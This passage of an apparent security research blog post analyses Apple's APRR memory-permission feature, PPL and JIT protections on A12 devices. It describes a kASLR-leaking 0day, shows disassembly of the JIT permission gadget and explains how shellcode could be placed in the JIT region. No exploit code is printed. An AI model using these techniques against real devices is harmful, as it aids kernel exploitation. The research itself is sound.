455With knowledge of how APRR works, notice anything off? Anything about __PPLDATA_CONST?
456
457Yep, that permission is not remapped (or remapped onto itself, if you will), which means it’s actually mapped as --x in EL0! This constitutes a vulnerability that lets you brute-force the kASLR slide by simply installing a mach exception handler and repeatedly jumping to locations within the kernel’s address range. If you get an exception of type 1, it’s unmapped/inaccessible memory, but if you get an exception of type 2, you hit __PPLDATA_CONST. (Note that you can’t leak data from that page though - you might assume you could, because the exception message contains the faulting instruction. However, that is obtained via copyin, which refuses to operate on kernel addresses.) PoC is available here and is still a 0day at the time of writing.
458
459Now there is a lot of irony in this:
460
461Not only did random researchers think the UXN bit got repurposed, but so do Apple engineers apparently!
462This is a vulnerability so fundamental that it is trivial to exploit, takes virtually no time, and is reachable from even the most heavily sandboxed contexts.
463It affects nothing but the latest chip generation. A11 and earlier are safe, it only exists on A12/A12X. Or, to quote Ian Beer on the matter:
464
465So what can you do to protect yourself?
466Use an older device!
467[is Britishly outraged]
468
469There isn’t even a reason to put __PPLDATA_CONST under APRR! What are you gonna do, make it more readonly than it already is?
470This is the peak of mitigation madness. We literally have one mitigation breaking another.
471Apple hardware team appears to be really competent, ehh but the software team…
472And this isn’t even the end of the story, but I’ll leave the rest as an exercise to the reader.
473
474Pentesting APRR
475Aside from the info leak that presented itself so openly, let’s go back to try and see what protects APRR against a motivated attacker. In the case of JIT, things are pretty simple:
476
4770x188347298 002298f2 movk x0, 0xc110
4780x18834729c e0ffbff2 movk x0, 0xffff, lsl 16
4790x1883472a0 e001c0f2 movk x0, 0xf, lsl 32
4800x1883472a4 0000e0f2 movk x0, 0, lsl 48
4810x1883472a8 000040f9 ldr x0, [x0]
4820x1883472ac e0f21cd5 msr s3_4_c15_c2_7, x0
4830x1883472b0 df3f03d5 isb
4840x1883472b4 012298f2 movk x1, 0xc110
4850x1883472b8 e1ffbff2 movk x1, 0xffff, lsl 16
4860x1883472bc e101c0f2 movk x1, 0xf, lsl 32
4870x1883472c0 0100e0f2 movk x1, 0, lsl 48
4880x1883472c4 280040f9 ldr x8, [x1]
4890x1883472c8 e9f23cd5 mrs x9, s3_4_c15_c2_7
4900x1883472cc 1f0109eb cmp x8, x9
4910x1883472d0 c1020054 b.ne 0x188347328
492After the write to the system register, the commpage address is re-constructed and the value re-loaded, and checked against the value currently in the register. This prevents us from ROP’ing into the middle of the memcpy gadget and changing the register to an arbitrary value. So APRR itself is protected, but in the face of a calling primitive, the memcpy function will still happily put some shellcode in the JIT region for you, no change to the system register needed. And once you have code in the JIT region, the entire model falls apart, as you now can freely change the system register.
493
494As for the kernel side, things are more complex there. I’ll omit the code for brevity, but a lot more cases have to be considered. The PPL entry gadget also has ROP protection, and the exit gadget is on a page that is only executable in privileged mode, so that doesn’t need it. In addition, interrupts as well as panics have to be dealt with in a safe way.
495Panics are handled by having a per-CPU struct in __PPLDATA, which contains a flag saying whether we are currently in PPL or not. That flag gets set by the PPL entry tramp and cleared by the exit routing, and panic simply calls out to the latter if the flag is set, before continuing down its path.
496Interrupts take a similar, albeit more nuanced approach. For a start, __PPLTRAMP has them disabled, but sets daifset back to its original value before actually jumping into __PPLTEXT. Now rather than checking the per-CPU data struct, the exception vectors for EL1 simply check the APRR register itself, and if it matches the privileged value, go through the PPL exit tramp. If it doesn’t though, they still check whether it matches the unprivileged value, and if not, spin. This means that even if you somehow get control of the register, you can’t reasonably set it to any value other than the existing two anyway, since the next exception you take will kill you.
497
498So again APRR itself is safe, but what about PPL? Can we pull the same tricks as with JIT? For the most part, PPL seems to carefully sanitise the input you give it. But then at random, for example when it came to the trust cache, they didn’t bother with that and put all their faith in PAC instead, only to be monumentally let down. Taking a look at the iOS 13 beta kernels though, this appears fixed.
499Apart from that, it might be noteworthy that, same as with JIT, any single crack will tear the entire model down. If __PPLDATA or any single page table can be remapped as non-PPL, or can be written to by other means, via peripherals or the dark arts, then that can immediately be used to extend this capability to the rest of PPL-protected memory. But eh, it’s probably fine, right? ;)
500
501Digging deeper
502What XNU does with APRR is… alright I guess, but when we get such an undocumented blackbox feature, it would be outright irresponsible to not go and drive it up to its limits, right?
503
504Again, getting shellcode execution in EL1 is left as an exercise to the reader (be that in skill or patience), but once you do have that, there’s a good bunch of things to test:
505
506When were these registers actually introduced?
507What do they reset to?
508What are their maximal and minimal values? Can you just set APRR0_EL1 to 0x7777777777777777 and access kernel memory from userland?
509Is the 0x8 bit settable in any field? Does it have a function?
510How does HPD affect KTRR?
511What about PAN (SMAP) and WXN?
512Are the permissions accurately reflected by the AT instruction?
513Can you create otherwise unobtainable permissions, such as write-only?
514To answer all of that, I wrote a good bunch of shellcode that will run a number of different tests and dump the results into memory. The code is available here and raw results here.
515
516In summary:
517
518Registers 6 and 7 appeared on the A11, but the core APRR registers 0 and 1 are present back on the A10 already. (Apple seems to have been planning this for quite a while!)
519Unlike virtually any other register, registers 0 and 1 reset to their maximum values, which are 0x4545010167670101/0x4455445566666677 respectively.
520Every bit can be set to zero, but bits that are zero at reset can never be set to one. This also means the 0x8 bit is never settable.
521TTE and HPD bits are processed before anything else. This yields what I call the “input value”.
522The input value is then copied to a “working value”, to which APRR, PAN and WXN are applied. Each of these modifies the working value, but makes decisions based on the input value rather than the working value.
523The at instructions do accurately reflect the effective permissions.
524It is possible to create write-only memory and such.
525Amidst all my test results, something stood out though: weird things happen when you turn on both PAN and WXN. Let’s diff 0xffffffffffffffff-0xffffffffffffffff-PAN-WXN.txt and 0xfff0fff0fff0fff0-0xfff0fff0fff0fff0-PAN-WXN.txt, for example:
526
527diff
528
529It’s the first line that’s off here. APRR would dictate that the permissions should be none, yet EL1 can read and write. It appears that, if all of the following are true:
530
531PAN is enabled
532WXN is enabled
533The access is privileged
534WXN applies
535PAN does not apply
536Then the APRR register is not consulted. In addition, for the at instruction it seems to be enough to have both PAN and WXN enabled to break everything:
537
538diff
539
540For what it’s worth, XNU runs with PAN on and WXN off - but still! How does something like that happen?! Is there some Verilog code passage now where it says = when it should say &=? Did I say Apple’s hardware team was really competent? I might have to track back a bit on that… but yet again already we’ve seen one mitigation break another.
541
542Conclusion
543APRR is a pretty cool feature, even if parts of it are kinda broke. What I really like about it (besides the fact that it is an efficient and elegant solution to switching privileges) is that it untangles EL1 and EL0 memory permissions, giving you more flexibility than a standard ARMv8 implementation. What I don’t like though is that it has clearly been designed as a lockdown feature, allowing you only to take permissions away rather than freely remap them.
544
545It’s also evident that Apple is really fond of post-exploit mitigations, or just mitigations in general. And on one hand, getting control over the physical address space is a good bit harder now. But on the other hand, Apple’s stacking of mitigations is taking a problematic turn when adding new mitigations actively creates vulnerabilities now.
546
547But at last, we might have gathered enough information to make an educated guess as to what the acronym “APRR” actually stands for. My best guess is “Access Protection ReRouting”.
548I hear when Project Zero tries to guess the meaning behind acronyms though, all Apple engineers have to offer is a smug grin, so maybe it’s also just “APple Rick Rolling”.
549
550For typos, feedback, content questions etc, feel free to open a ticket, ping me on Twitter or email me (*@*.net where * = phoaxy).
551
552THE INFORMATION ABOVE IS IMPORTANT, Also this took me a while so... show me some support!
553
554Till next time, peace out. ;)
555
556Thanks to
557windknown for being the reason I started looking into APRR.
558qwerty for being there to bounce ideas off of one another.
559Sparkey for testing a bunch of stuff for me on devices I didn’t have.